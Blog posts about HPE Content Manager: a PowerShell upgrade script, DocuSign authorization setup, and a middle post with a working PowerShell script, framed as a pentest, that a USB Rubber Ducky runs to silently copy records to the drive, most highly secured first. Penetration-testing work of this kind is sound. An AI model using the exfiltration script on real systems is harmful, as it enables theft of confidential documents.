Scripting the workstation upgrade

I've been upgrading environments for years via batch files.  I think it's time I ported one of these into a Powershell script.  Batch files just seem so antiquated.

My batch script is broken down as follows:

  1. Script, Log File, and Machine Preparation
  2. Uninstall old products
  3. Install new product
  4. Clean the workstation and user profiles
  5. Apply any tweaks

Script, Log File, and Machine Preparation

First I need to identify where the logging information from the upgrade should be placed.  In this example I'll place it into the temporary path as defined in the environment variables.  This might not work for me if deploying administratively (retrieving those files requires you know which account executed the script), but it works for my example.

$logDir = Join-Path $env:TEMP "TRIM_Upgrade"
$logFile = Join-Path $logDir "$((get-date).ToString('yyyyMMdd')).log"
if ( (Test-Path $logFile) -eq $false ) 
{
    New-Item -ItemType File -Force -Path $logFile
    Write-Host "Created Log File: $($logFile)"
} else {
    Write-Host "Log File Already Existed: $($logFile)"
}

Uninstall old products

Most products can be uninstalled by executing "msiexec /X{<GUID>}", where <GUID> is the GUID of the application.  These are super easy to find in the registry when inspecting the environment to be upgraded. With those in hand I can sequence their removal by manually invoking the command whilst supplying the GUID.  Obviously an important thing to consider is how to react when one of the products is missing (is that an upgrade failure?), but one easy way to accomplish this is shown below.

$uninstalls = @( 'D8B2D69F-7FA0-4BC8-8E31-C675162229D1', 'B480C3B2-9432-41B9-BD4A-421A4A6AB4C6', '112268A9-B0FB-421C-BEDB-A08B32E84207' )
foreach ( $uninstall in $uninstalls ) 
{
    if ( (Start-Process -FilePath "msiexec.exe" -ArgumentList "/X{$($uninstall)} /passive /norestart" -Wait -Passthru).ExitCode -eq 0 ) {
        Write-Host "Uninstalled: $($uninstall)"
    } else {
        Write-Host "Not Uninstalled: $($uninstall)"
    }
}

Install new Product

To install the new version we need to execute the same command, but with different parameters.  One parameter will be the source installer, another will be where to log MSIEXEC output, and the rest will provide values to necessary fields used by the installer.

$msiFile =  'HPE_CM_x86.msi'
$installerLog = Join-Path $logDir ($msiFile+'.log')
$args =  """$($msiFile)"" /qb /norestart /l*vx ""$($installerLog)"" INSTALLDIR=""C:\Program Files\Hewlett Packard Enterprise\Content Manager\"" ADDLOCAL=HPTRIM,Client HPTRIMDIR=""C:\HPE Content Manager"" DEFAULTDBNAME=""CM"" DEFAULTDB=""CM"" STARTMENU_NAME=""HPE Content Manager"" TRIM_DSK=""1"" TRIMREF=""TRIM"" PRIMARYURL=""WG1:1137"" SECONDARYURL=""TRIMWG2:1137"" AUTOGG=""1"" WORD_ON=""0"" EXCEL_ON=""0"" POWERPOINT_ON=""0"" PROJECT_ON=""0"" OUTLOOK_ON=""1"" AUTHMECH=""0"""
if ( (Start-Process -FilePath 'msiexec.exe' -ArgumentList $args -Wait -Passthru).ExitCode -eq 0 ) {
    Write-Host "Installed: $($msiFile)"
} else {
    Write-Host "Installation Failed: $($msiFile)"
}

Don't forget that HPE now released Content Manager patches using the MSP approach, so after executing this you'd also the apply the patches in the same manner.  Same thing goes for any add-ons. 

Since this is now in Powershell, I could actually implement a commandlet with commandbinding such that I remotely perform the installation.  Implementing the script that way means you don't even really need to execute it via some central administrative location.  Anyone with access to powershell, with permission to install software, and with remote pssession access to the target machine can perform an upgrade via the script.  That is something batch files could never do.

Cleaning up the Workstation

The installation process leaves all kinds of things on the machine.  Some are okay and some are not.  Ultimately the cleanup and tweaking tasks are geared towards ensuring the end-user's experience is desirable (or at least acceptable).  

A prime example is the dreaded lingering, broken application shortcut:

Last icon shown above is a broken link, which uninstall cannot remove

Last icon shown above is a broken link, which uninstall cannot remove

When the uninstall happens from the previous version, it has no capability to go into each user's profile and remove any links they have manually pinned within the operating system.  That includes the desktop, start menu, the task bar, and quick access area of explorer.  Why not remove those as part of the upgrade?

$profiles = (gwmi win32_userprofile | select LocalPath)
foreach ( $profile in $profiles ) 
{
    $pinnedStartMenu = Join-Path $profile.LocalPath "AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\TRIM.lnk"
    if ( (Test-Path $pinnedStartMenu) -eq $true ) 
    {
        Remove-Item $pinnedStartMenu -Force
        Write-Host "Removed: $($pinnedStartMenu)"
    }
}

Applying Tweaks

Every piece of software has bugs.  During an upgrade it's important to overcome those bugs by implementing any fixes or tweaks required.  For instance, one of the CM builds searched for the existence of dictionary files in an incorrect spot. If left unresolved then no one would be able to use the spellchecker.  By handling that issue in the upgrade script we didn't let the bug impact usage of the product.

Exfiltrating Electronic Documents from Content Manager

I'm loving Powershell more and more!  The capabilities are outstanding and never-ending.  This can be both a blessing and a curse though, as it exposes functionality many administrators would loathe (if only they knew about the risks!).  

For instance, I just wrote a script to use as part of a pentest.  The ultimate goal of this pentest is to exfiltrate documents via a USB Rubber Ducky.  To accomplish that I need a light-weight script tailored to the scenario.

We can break down the script into 5 major pieces of logic:

  1. Setup the script
  2. Connect to CM
  3. Find and process security levels
  4. Find records for the levels
  5. Extract the files

With all this in place I'll create a ducky script to be compiled and placed on my rubber ducky.  Then I can stick that into any workstation where Content Manager has been installed and then silently extract as much content as I'd like to.  Take a look at the script below!


Setup the script

First things first, I need to import the Content Manager namespace.  I accomplish that by using Add-Type and pointing to the default installation location.  Now that won't work in all environments, but it's sufficient for my pentest.

Second, the USB Rubber Ducky will be inserted into the computer and then assigned a drive letter by Windows.  I won't know the drive letter, but I need it!  So I use Get-Location to retrieve the drive letter and then tack on an "R" to represents where I want my records to be placed.

Lastly, I fetch the current amount of free space on the MicroSD card I'll insert into the ducky.  My current hardware is limited to an 8 GB SD card, but after each exfiltration I'll swap out the card.  In case I don't, I don't want errors because I hardcoded the maximum amount to extract.  I also prepare a variable to track how much space I've extracted.

Add-Type -Path "C:\Program Files\Hewlett Packard Enterprise\Content Manager\HP.HPTRIM.SDK.dll"
$rootDrive = (get-location).Drive.Name
$rootPath = "$($rootDrive):\r"
$maxVolume = Get-WmiObject Win32_LogicalDisk -Filter "DeviceID='$($rootDrive):'" | Foreach-Object {$_.FreeSpace}
$curVolume = [long]0

Connect to CM

I don't really need much code for this task, but I'm considering it to be a distinct task in my pentest.  That's because I may want to expand upon the logic.  I envision dynamically determining the various datasets available on the workstation and then repeating the extraction for each dataset (or possibly doing some reconnaissance and then inserting server names or dataset IDs).

$db = New-Object HP.HPTRIM.SDK.Database

Find and process security levels

There's not really much of a reason to exfiltrate public electronic records, right?  So I want to ensure that I'm focusing on the secured stuff first.  To do that I need to search for all the available levels and then process them in reverse order. 

$levels = New-Object HP.HPTRIM.SDK.TrimMainObjectSearch -ArgumentList $db, SecurityLevel
$levels.SearchString = "all"
$levels.SetSortString("levelNumber-")
foreach ( $level in $levels ) 
{
	#insert record logic here
    if ( [long]$curVolume -ge [long]$maxVolume ) 
    {
        break;
    }
}

Find and process records

At this point in the script I've got everything I need to search for records, so I just need to craft the search string and execute it.  Then I can process each record!

$recs = New-Object HP.HPTRIM.SDK.TrimMainObjectSearch -ArgumentList $db, Record
	$searchString = "securityLevel:$($level.LevelNumber) electronic"
	$recs.SearchString = $searchString
	$recs.SetSortString('createdOn-')
	foreach ( $result in $recs ) 
	{
		$rec = [HP.HPTRIM.SDK.Record]$result
		[long]$curVolume += [long]$rec.DocumentSize
		if ( [long]$curVolume -lt [long]$maxVolume ) 
		{
			$sp = Join-Path $rootPath $rec.SuggestedFileName
			$rec.GetDocument($sp)
		} else {
			break;
		}
	}

Authorizing Documents via DocuSign

There's a pretty nifty new feature in Content Manager: the Document Review process.  This process includes an authorization feature that supports DocuSign.  You can use a more simple process, but I'm focusing on DocuSign at the moment.  With DocuSign you get those cool "sign here" spots in a document (like what my accountant might send me).  

Once signed (or Authorized in the CM terminology), the signed copy can become your final record.  Very cool!  

Starting the Authorization (Signing) Process

As a normal end-user I create a new record of type "Policy Document".  Then I right-click on it and select Document Review->Start Authorization 

In the real world I would have probably done a lot more before getting to this point.  Imagine numerous revisions, actions, meta-data fields, etc.  For simplicity I'm just skipping all of that.  I want this word document to be signed.. and that's it. 

When I Start Authorization, the Content Manager rendering service will hand-off the electronic document for processing.  Once it's been handed off, DocuSign emails the responsible location.  

I clicked the link and then signed the document.

The Content Manager rendering service will routinely check (every 30 minutes by default) for updates to the status of pending request.  After the update is processed I should be able to see a new rendition on my original record.  The screenshot below shows what that would look like.

Success! &nbsp;Signed rendition via DocuSign

Success!  Signed rendition via DocuSign

Technically the process isn't done yet.  The authorization has been received and now it's time to finalize the record.  It's an opportunity to update the notes, locations, meta-data, or access controls for the record.  The menu options reflect this state:

Menu options available at last stage of the process

Menu options available at last stage of the process

After selecting the Finalize Document feature (not to be confused with the Finalize option under the electronic menu!!) for Document Review, I'm asked to decide how to handle the record.  I'm disappointed that the promotion option is not checked by default, but I can easily check it.  

Once I click OK, all users can now see the digitally signed copy as the final revision.

Appearance of the final record within Content Manager

Appearance of the final record within Content Manager

This has been a very straight-forward process in terms of setup and configuration.  I can see tons of possible uses.  Entirely possible to have external parties digitally signing records without them ever knowing Content Manager is in-use.  You can also setup template for your processes, signature spots, and comment sections.

 

Configuration of Content Manager

I created one record type named "Policy Document".  I used all of the default settings for the record type, except for the document review tab.  There I've checked the authorization required checkbox, specified "Policy Manager" as the location responsible, DocuSign as my process, and 2 days for my authorization reminder duration.

The Policy Manager is a location with a name, login name and email address:

Dataset Rendering Configuration

I setup my Render service configuration to reflect my DocuSign account details.  The help file directs you to use "docusign.com", but since I'm using a demo account I couldn't use that.  I got HTTP 301 errors when I tried it.  To figure it out I went to the DocuSign REST API Explorer (https://apiexplorer.docusign.com), looked at the URL those worked with and then plugged that into the configuration.  Screenshot below:

Rendering Service Configuration

Rendering Service Configuration

As you can also see, I lowered my polling interval from 1800 seconds (30 minutes) to 30 seconds.  Be careful with that though, as your terms of service with DocuSign are important to adhere to.  Don't get locked out! :)